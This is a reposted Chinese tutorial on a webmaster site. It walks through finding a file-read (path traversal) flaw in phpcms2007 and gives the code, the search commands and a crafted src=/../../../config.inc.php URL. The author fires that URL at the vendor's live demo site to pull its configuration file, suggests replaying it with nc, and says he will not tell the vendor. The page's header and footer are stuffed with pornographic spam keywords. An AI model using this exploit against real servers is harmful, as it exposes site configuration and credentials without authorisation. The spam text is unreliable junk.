青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長網

17站長網 首頁 安全 安全教程 查看內容

關于簡單的php源代碼泄露漏洞的發掘

2022-9-24 10:19| 查看: 2400 |來源: 互聯網

我們知道在asp中出現得最多的還是sql注入,不過在php中由于magic_quotes_gpc為on的情況下特殊字符會被轉義,所以即使有很多時候存在sql注入也無法利用。但是php ...

我們知道在asp中出現得最多的還是sql注入,不過在php中由于magic_quotes_gpc為on的情況下特殊字符會被轉義,所以即使有很多時候存在sql注入也無法利用。但是php強大的文件操作功能卻使我們能體會到在asp中無法體會的樂趣,我想php自帶的文件操作函數能讓你為之心跳加快~~嘿嘿 這次我發掘的是phpcms2007的源代碼泄露漏洞 再次向Phpcms2007的開源行為致敬!! 開始吧, findstr /s /n /i readfile *.php >readfile.txt (結果我只給出有用的) 其他的文件操作函數可以自己定義查找 module\picture\show_pic.inc.php:8:readfile($file); 跟進這個文件看看吧,呵呵,比較小,我喜歡 [Copy to clipboard] [ - ]CODE:

defined(’IN_PHPCMS’) or exit(’Access Denied’);
require PHPCMS_ROOT.’/module/’.$mod.’/include/common.inc.php’;
isset($src) or exit;
$file = PHPCMS_ROOT.’/’.$PHPCMS[’uploaddir’].’/’.$CHA[’channeldir’].’/’.$MOD[’upload_dir’].’/’.$src;
if(empty($PHP_REFERER) || !strpos($PHP_REFERER, $PHP_DOMAIN)) $file = PHPCMS_ROOT.’/images/error.jpg’;
header("Content-type:image/pjpeg");
readfile($file);
?>
一路分析下。。。 先包含文件/module/’.$mod.’/include/common.inc.php 如果存在變量$src則賦予它路徑并把值交給變量$file 然后就是就進入if 這里我不看其他的文件簡單猜測下應該是判斷url路徑來源,也就是防盜鏈的功能 然后就header()一個圖片頭 呵呵,輕輕松松就readfile($file); 可以看出它沒有判斷$src的文件類型,如果我們提交一個src=*.php也會被readfile 好吧,在這里漏洞是出現了 不過由于“defined(’IN_PHPCMS’) or exit(’Access Denied’);”,所以我們是無法直接利用這個漏洞文件的 只能是在其他包含這個文件的php文件中利用 繼續吧 [Copy to clipboard] [ - ]CODE:
findstr /s /i /n show_pic.inc.php *.php >show_pic.inc.php.txt picture\show_pic.php:4:require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";
進去看看 [Copy to clipboard] [ - ]CODE:

require "./config.inc.php";
require "../include/common.inc.php";
require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";
?>
呵呵,要是register_globals為on的話就可以直接利用這個文件讀取目標文件了
那就測試吧 官方是演示站是 [Copy to clipboard] [ - ]CODE:
http://demo.phpcms.cn/
那就這樣構造url [Copy to clipboard] [ - ]CODE:
/picture/show_pic.php?src=/../../../config.inc.php
嘿嘿,讀取的就是網站的配置文件 直接訪問 [Copy to clipboard] [ - ]CODE:
http://demo.phpcms.cn//picture/show_pic.php?src=/../../../config.inc.php
呵呵,猜測沒錯!! 那我們可以先訪問http://demo.phpcms.cn/抓包 用nc發包 get選項就設置為 [Copy to clipboard] [ - ]CODE:
/picture/show_pic.php?src=/../../../config.inc.php
這里我就用刺猬的一個post提交工具代替了 測試結果如圖 ok,就分析到這里了 希望大家不要利用這個做違法的事,嘿嘿!! 偶是壞孩子,不通知官方了~·好孩子去通知下。

本文最后更新于 2022-9-24 10:19,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 亚洲蜜桃AV色情精品成人 | 亚洲AV午夜福利精品香蕉麻豆 | 入禽太深免费视频10 | 精品国产成a人在线观看 | 蜜饯1V1高H-| 欧美日韩亚洲第一区在线 | 竹菊精品久久久久久久99蜜桃 | 玖玖爱这里只有精品视频 | 免费人成视频X8X8国产更快乐 | 桥本有菜黑丝 | 好大好硬好爽好深好硬视频 | 伊人久久大香线蕉无码麻豆 | 国产精品无需播放器 | 无人视频在线观看免费播放影院 | 在线观看亚洲专区5555 | 暖暖视频免费观看视频 | 嘟嘟嘟WWW在线观看视频高清 | 国产人妻人伦精品59HHH | 超碰97人人做人人爱少妇 | 在线观看中文字幕码2021不用下载 | 石原莉奈rbd806中文字幕 | 美女18黄 | 白丝美女被狂躁免费漫画 | 5g在线视讯年龄确认海外禁止进入 | 亚洲妈妈精品一区二区三区 | beeg日本老妇人 | 国产三级精品三级男人的天堂 | 蜜桃麻豆WWW久久囤产精品免费 | 国产日韩精品一区二区在线观看 | 嫩草欧美曰韩国产大片 | 玩高中女同桌肉色短丝袜脚文 | 牛牛在线国产精品 | 荡乳乱公小说 | 国产精品夜夜春夜夜爽久久小 | 一二三四电影完整版免费观看 | 国产美女视频一区二区二三区 | 亚洲黄网站wwwwww| 2019午夜75福利不卡片在线 | 国产成人精视频在线观看免费 | 久久精品免费电影 | 欧美性猛交XXXX乱大交极品 |